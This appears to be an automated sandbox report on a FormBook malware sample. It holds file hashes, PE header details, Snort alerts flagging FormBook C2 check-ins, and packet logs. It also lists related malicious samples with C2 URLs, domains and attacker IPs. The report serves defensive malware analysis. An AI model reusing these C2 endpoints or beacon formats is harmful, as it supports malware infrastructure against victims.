                                                            • www.findandnews.com/ivay/?PbvpO8=6gv1qnhzF9A10KXY/isAwMlFQWyEmS9UpIvJZIj8FtsxYUMBmnSPxtiZ+YsU8PqO9QOnYA==&-Zp=fxoDxR_8sz1ds
                                                            SHED.EXEGet hashmaliciousBrowse
                                                            • www.ishqjewelery.com/r8pp/?T8Vh=XWduvXZNHS4bPEsrqN6nVqGvoVXaSAQ8OfLousPLK9OfMBzbamlcH83j/zxbNVWd7Hdc&-ZPl=1bdpal
                                                            c4p1vG05Z8.exeGet hashmaliciousBrowse
                                                            • www.blowdryingcontest.com/ivay/?oPnpM4=rzvcDh5JJAApnDCPlMx8eXAY2MDTiysFnejtCDXDG8SNWyUSjwyZ7d0wPbiDwxb6GMn0&Lh0l=ZTdp62D8T
                                                            DHL Shipment Notification 7465649870.pdf.exeGet hashmaliciousBrowse
                                                            • www.loveworldjerusalem.com/cna8/?kRjH3=4yrwq51yccnUGsar58/RTgXHvxXg7ZQxNEHxiQ3wpBJ0dpKKlLg0NuXjCdLS7NldBAfB&0pn=WHuxqns0PJ
                                                            G6FkfjX5Ow.exeGet hashmaliciousBrowse
                                                            • www.tencenttexts.com/nsag/?KtxH=1KNBKkR/3sxsfy5Hm2m4k9rliP52H6WM2eUoblDVMc3evr5lbTgPZczIDjCxHbEA+Jbdbncfog==&OtNHTP=wZOPRjupLNyPn

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            www.ntljcb.comNewOrder.xlsmGet hashmaliciousBrowse
                                                            • 154.201.205.155
                                                            shops.myshopify.comORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            ORDER LIST.xlsxGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            PO_210222.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            SecuriteInfo.com.Trojan.Inject4.6572.10651.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            SecuriteInfo.com.Trojan.Inject4.6572.17143.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            PDF.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            D6ui5xr64I.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            Drawings.xlsmGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            Purchase order.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            AgroAG008021921doc_pdf.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            IMG_7189012.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            DHL Shipment Notification 7465649870,pdf.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            DHL Shipment Notification 7465649870.pdf.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            q9xB9DE3RA.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            51BfqRtUI9.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            PO copy.pdf.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            RFQ 2-16-2021-.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74
                                                            NEW ORDER - VOLVO HK HKPO2102-13561,pdf.exeGet hashmaliciousBrowse
                                                            • 23.227.38.74

                                                            ASN

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            AS-26496-GO-DADDY-COM-LLCUSPO_210223.exeGet hashmaliciousBrowse
                                                            • 23.229.197.103
                                                            NewOrder.xlsmGet hashmaliciousBrowse
                                                            • 107.180.25.8
                                                            PO-29840032.exeGet hashmaliciousBrowse
                                                            • 107.180.2.197
                                                            PO_210222.exeGet hashmaliciousBrowse
                                                            • 184.168.131.241
                                                            Order83930.exeGet hashmaliciousBrowse
                                                            • 192.169.223.13
                                                            IMG_01670_Scanned.docGet hashmaliciousBrowse
                                                            • 184.168.131.241
                                                            IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                            • 184.168.131.241
                                                            PDF.exeGet hashmaliciousBrowse
                                                            • 184.168.131.241
                                                            Statement-ID28865611496334.vbsGet hashmaliciousBrowse
                                                            • 107.180.91.179
                                                            Statement-ID21488878391791.vbsGet hashmaliciousBrowse
                                                            • 107.180.91.179
                                                            Statement-ID72347595684775.vbsGet hashmaliciousBrowse
                                                            • 107.180.91.179
                                                            SOA.exeGet hashmaliciousBrowse
                                                            • 184.168.131.241
                                                            YSZiV5Oh2E.exeGet hashmaliciousBrowse
                                                            • 184.168.131.241
                                                            Confirmation.exeGet hashmaliciousBrowse
                                                            • 184.168.131.241
                                                            Purchase order.exeGet hashmaliciousBrowse
                                                            • 184.168.131.241
                                                            Request For Quotation.PDF.exeGet hashmaliciousBrowse
                                                            • 184.168.131.241
                                                            IMG_7189012.exeGet hashmaliciousBrowse
                                                            • 184.168.131.241
                                                            DHL Shipment Notification 7465649870,pdf.exeGet hashmaliciousBrowse
                                                            • 184.168.131.241
                                                            urgent specification request.exeGet hashmaliciousBrowse
                                                            • 184.168.131.241
                                                            P.O-48452689535945.exeGet hashmaliciousBrowse
                                                            • 107.180.48.248
                                                            POWERLINE-AS-APPOWERLINEDATACENTERHKNewOrder.xlsmGet hashmaliciousBrowse
                                                            • 154.201.205.155
                                                            Order83930.exeGet hashmaliciousBrowse
                                                            • 154.215.106.100
                                                            RFQ for Marjan Development Program.exeGet hashmaliciousBrowse
                                                            • 154.86.32.52
                                                            ForeignRemittance_20210219_USD.xlsxGet hashmaliciousBrowse
                                                            • 156.227.188.203
                                                            SHED.EXEGet hashmaliciousBrowse
                                                            • 154.213.100.41
                                                            wFzMy6hehS.exeGet hashmaliciousBrowse
                                                            • 192.151.233.118
                                                            INCHAP_Invoice_21.xlsxGet hashmaliciousBrowse
                                                            • 192.151.233.118
                                                            ffOWE185KP.exeGet hashmaliciousBrowse
                                                            • 192.151.233.118
                                                            mWxzYlRCUi.exeGet hashmaliciousBrowse
                                                            • 192.151.233.118
                                                            Cargo_remitP170201.xlsxGet hashmaliciousBrowse
                                                            • 192.151.233.118
                                                            quotations pdf.exeGet hashmaliciousBrowse
                                                            • 156.243.221.75
                                                            Project.pdf.exeGet hashmaliciousBrowse
                                                            • 154.213.241.19
                                                            order pdf.exeGet hashmaliciousBrowse
                                                            • 156.252.99.134
                                                            YCVj3q7r5e.exeGet hashmaliciousBrowse
                                                            • 192.151.255.12
                                                            th520.exeGet hashmaliciousBrowse
                                                            • 103.75.46.74
                                                            DHL Parcel Details.xlsxGet hashmaliciousBrowse
                                                            • 154.216.241.144
                                                            DCSGROUP.xlsxGet hashmaliciousBrowse
                                                            • 160.124.66.18
                                                            purchase order doc.exeGet hashmaliciousBrowse
                                                            • 154.201.177.118
                                                            Inquiry pdf.exeGet hashmaliciousBrowse
                                                            • 156.243.221.75
                                                            S343160101221012616310.exeGet hashmaliciousBrowse
                                                            • 154.216.106.165
                                                            GODADDY-AMSDENewOrder.xlsmGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            7R29qUuJef.exeGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            YSZiV5Oh2E.exeGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            urgent specification request.exeGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            Shinshin Machinery.exeGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            CMahQwuvAE.exeGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            PO#652.exeGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            Claim-1097837726-02162021.xlsGet hashmaliciousBrowse
                                                            • 160.153.137.40
                                                            Claim-509072992-02162021.xlsGet hashmaliciousBrowse
                                                            • 160.153.137.40
                                                            wfEePDdnmR.exeGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            955037-012021-98_98795947.docGet hashmaliciousBrowse
                                                            • 160.153.137.14
                                                            po.exeGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            Details!!.exeGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            AANK5mcsUZ.exeGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            PvvkzXgMjG.exeGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            tXoqs48Ta9.rtfGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            q2o0a1neTm.exeGet hashmaliciousBrowse
                                                            • 160.153.136.3
                                                            Order 8953-PDF.exeGet hashmaliciousBrowse
                                                            • 160.153.133.164

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4pFzkB6ePK.exe.log
                                                            Process:C:\Users\user\Desktop\4pFzkB6ePK.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1406
                                                            Entropy (8bit):5.341099307467139
                                                            Encrypted:false
                                                            SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
                                                            MD5:E5FA1A53BA6D70E18192AF6AF7CFDBFA
                                                            SHA1:1C076481F11366751B8DA795C98A54DE8D1D82D5
                                                            SHA-256:1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
                                                            SHA-512:77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
                                                            Malicious:true
                                                            Reputation:moderate, very likely benign file
                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.409346675519229
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:4pFzkB6ePK.exe
                                                            File size:484864
                                                            MD5:6dd83e20f43a9bd2e136fcd77131f7e4
                                                            SHA1:2d816c160bba20f5e3989af02985118e42a4fe70
                                                            SHA256:5babb878615fbf3b56008f4d7becccdb0a316e3eecb95ce99ea2a6c9d5a8a19a
                                                            SHA512:4f485cce03cd198389906fe21ffed00982408c9f8d688af6ef1067d3959e4df96d4bb08f53244d32d571b5735b4957c3e35156081b68495922b95bb5ca1b9b33
                                                            SSDEEP:6144:r6dxsDr+0lcofIvWvX7/W1CIVXTjRURq4MgfyyglZyxk1L8x6p9v1jN:r6dxi+0lcuIvKYCqTyDshlZyxk11p9j
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y4`..............P..P.........."o... ........@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:00828e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x476f22
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp:0x603459E0 [Tue Feb 23 01:26:56 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:v4.0.30319
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x76ed00x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x780000x1020.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x74f280x75000False0.752481053018data7.42579480649IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x780000x10200x1200False0.361111111111data4.72391408338IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x7a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountry
                                                            RT_VERSION0x780900x36cdata
                                                            RT_MANIFEST0x7840c0xc0fXML 1.0 document, UTF-8 Unicode (with BOM) text

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Version Infos

                                                            DescriptionData
                                                            Translation0x0000 0x04b0
                                                            LegalCopyrightCopyright 2018
                                                            Assembly Version1.0.0.0
                                                            InternalNameServerObjectTerminatorSink.exe
                                                            FileVersion1.0.0.0
                                                            CompanyName
                                                            LegalTrademarks
                                                            Comments
                                                            ProductNameRegisterVB
                                                            ProductVersion1.0.0.0
                                                            FileDescriptionRegisterVB
                                                            OriginalFilenameServerObjectTerminatorSink.exe

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            02/23/21-09:15:07.557417TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3160.153.128.38
                                                            02/23/21-09:15:07.557417TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3160.153.128.38
                                                            02/23/21-09:15:07.557417TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3160.153.128.38
                                                            02/23/21-09:16:00.581463TCP1201ATTACK-RESPONSES 403 Forbidden804973923.227.38.74192.168.2.3
                                                            02/23/21-09:16:06.048076TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.3194.59.164.91
                                                            02/23/21-09:16:06.048076TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.3194.59.164.91
                                                            02/23/21-09:16:06.048076TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.3194.59.164.91

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Feb 23, 2021 09:14:56.811091900 CET4972580192.168.2.395.130.17.35
                                                            Feb 23, 2021 09:14:56.864130974 CET804972595.130.17.35192.168.2.3
                                                            Feb 23, 2021 09:14:56.864233017 CET4972580192.168.2.395.130.17.35
                                                            Feb 23, 2021 09:14:56.864423037 CET4972580192.168.2.395.130.17.35
                                                            Feb 23, 2021 09:14:56.917222977 CET804972595.130.17.35192.168.2.3
                                                            Feb 23, 2021 09:14:56.919253111 CET804972595.130.17.35192.168.2.3
                                                            Feb 23, 2021 09:14:56.919291973 CET804972595.130.17.35192.168.2.3
                                                            Feb 23, 2021 09:14:56.919476986 CET4972580192.168.2.395.130.17.35
                                                            Feb 23, 2021 09:14:56.919516087 CET4972580192.168.2.395.130.17.35
                                                            Feb 23, 2021 09:14:56.972480059 CET804972595.130.17.35192.168.2.3
                                                            Feb 23, 2021 09:15:01.998790979 CET4972680192.168.2.3184.168.131.241
                                                            Feb 23, 2021 09:15:02.186427116 CET8049726184.168.131.241192.168.2.3
                                                            Feb 23, 2021 09:15:02.186537981 CET4972680192.168.2.3184.168.131.241
                                                            Feb 23, 2021 09:15:02.186706066 CET4972680192.168.2.3184.168.131.241
                                                            Feb 23, 2021 09:15:02.373945951 CET8049726184.168.131.241192.168.2.3
                                                            Feb 23, 2021 09:15:02.423268080 CET8049726184.168.131.241192.168.2.3
                                                            Feb 23, 2021 09:15:02.423291922 CET8049726184.168.131.241192.168.2.3
                                                            Feb 23, 2021 09:15:02.423616886 CET4972680192.168.2.3184.168.131.241
                                                            Feb 23, 2021 09:15:02.423691988 CET4972680192.168.2.3184.168.131.241
                                                            Feb 23, 2021 09:15:02.612595081 CET8049726184.168.131.241192.168.2.3
                                                            Feb 23, 2021 09:15:07.505249977 CET4973380192.168.2.3160.153.128.38
                                                            Feb 23, 2021 09:15:07.555166960 CET8049733160.153.128.38192.168.2.3
                                                            Feb 23, 2021 09:15:07.555562973 CET4973380192.168.2.3160.153.128.38
                                                            Feb 23, 2021 09:15:07.557416916 CET4973380192.168.2.3160.153.128.38
                                                            Feb 23, 2021 09:15:07.607343912 CET8049733160.153.128.38192.168.2.3
                                                            Feb 23, 2021 09:15:07.622117996 CET8049733160.153.128.38192.168.2.3
                                                            Feb 23, 2021 09:15:07.622143030 CET8049733160.153.128.38192.168.2.3
                                                            Feb 23, 2021 09:15:07.622383118 CET4973380192.168.2.3160.153.128.38
                                                            Feb 23, 2021 09:15:07.672125101 CET8049733160.153.128.38192.168.2.3
                                                            Feb 23, 2021 09:15:13.054061890 CET4973480192.168.2.3106.13.210.52
                                                            Feb 23, 2021 09:15:16.058031082 CET4973480192.168.2.3106.13.210.52
                                                            Feb 23, 2021 09:15:22.074187994 CET4973480192.168.2.3106.13.210.52
                                                            Feb 23, 2021 09:15:36.341245890 CET4973780192.168.2.3106.13.210.52
                                                            Feb 23, 2021 09:15:39.356906891 CET4973780192.168.2.3106.13.210.52
                                                            Feb 23, 2021 09:15:44.453792095 CET4973880192.168.2.3154.201.205.155
                                                            Feb 23, 2021 09:15:44.798985004 CET8049738154.201.205.155192.168.2.3
                                                            Feb 23, 2021 09:15:44.799206018 CET4973880192.168.2.3154.201.205.155
                                                            Feb 23, 2021 09:15:44.799391985 CET4973880192.168.2.3154.201.205.155
                                                            Feb 23, 2021 09:15:45.144747019 CET8049738154.201.205.155192.168.2.3
                                                            Feb 23, 2021 09:15:45.223973989 CET8049738154.201.205.155192.168.2.3
                                                            Feb 23, 2021 09:15:45.223993063 CET8049738154.201.205.155192.168.2.3
                                                            Feb 23, 2021 09:15:45.224498034 CET4973880192.168.2.3154.201.205.155
                                                            Feb 23, 2021 09:15:45.224534988 CET4973880192.168.2.3154.201.205.155
                                                            Feb 23, 2021 09:15:45.357381105 CET4973780192.168.2.3106.13.210.52
                                                            Feb 23, 2021 09:15:45.571990013 CET8049738154.201.205.155192.168.2.3

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Feb 23, 2021 09:13:44.132865906 CET6493853192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:13:44.150470018 CET6015253192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:13:44.184493065 CET53649388.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:13:44.212117910 CET53601528.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:13:44.917905092 CET5754453192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:13:44.966555119 CET53575448.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:13:46.096698046 CET5598453192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:13:46.148264885 CET53559848.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:13:47.271435976 CET6418553192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:13:47.320187092 CET53641858.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:13:49.178528070 CET6511053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:13:49.238291025 CET53651108.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:13:50.274914980 CET5836153192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:13:50.323739052 CET53583618.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:13:51.124056101 CET6349253192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:13:51.173000097 CET53634928.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:13:52.673121929 CET6083153192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:13:52.721914053 CET53608318.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:13:53.674612999 CET6010053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:13:53.723342896 CET53601008.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:13:54.922506094 CET5319553192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:13:54.971316099 CET53531958.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:13:55.927941084 CET5014153192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:13:55.976810932 CET53501418.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:13:57.226416111 CET5302353192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:13:57.275106907 CET53530238.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:13:59.240513086 CET4956353192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:13:59.293328047 CET53495638.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:14:00.763343096 CET5135253192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:14:00.815289021 CET53513528.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:14:01.810743093 CET5934953192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:14:01.859688044 CET53593498.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:14:03.920547009 CET5708453192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:14:03.970453024 CET53570848.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:14:05.134267092 CET5882353192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:14:05.188800097 CET53588238.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:14:20.503155947 CET5756853192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:14:20.551903963 CET53575688.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:14:22.285072088 CET5054053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:14:22.334882975 CET53505408.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:14:39.118253946 CET5436653192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:14:39.166996956 CET53543668.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:14:56.726146936 CET5303453192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:14:56.804542065 CET53530348.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:15:01.935722113 CET5776253192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:15:01.997723103 CET53577628.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:15:05.110877991 CET5543553192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:15:05.169209003 CET53554358.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:15:06.544787884 CET5071353192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:15:06.618158102 CET53507138.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:15:07.437345982 CET5613253192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:15:07.503074884 CET53561328.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:15:12.667752981 CET5898753192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:15:13.053081989 CET53589878.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:15:33.171725988 CET5657953192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:15:33.223614931 CET53565798.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:15:35.457238913 CET6063353192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:15:35.524852037 CET53606338.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:15:35.681751013 CET6129253192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:15:36.003530979 CET53612928.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:15:39.144556046 CET6361953192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:15:39.220227957 CET53636198.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:15:44.236794949 CET6493853192.168.2.38.8.8.8
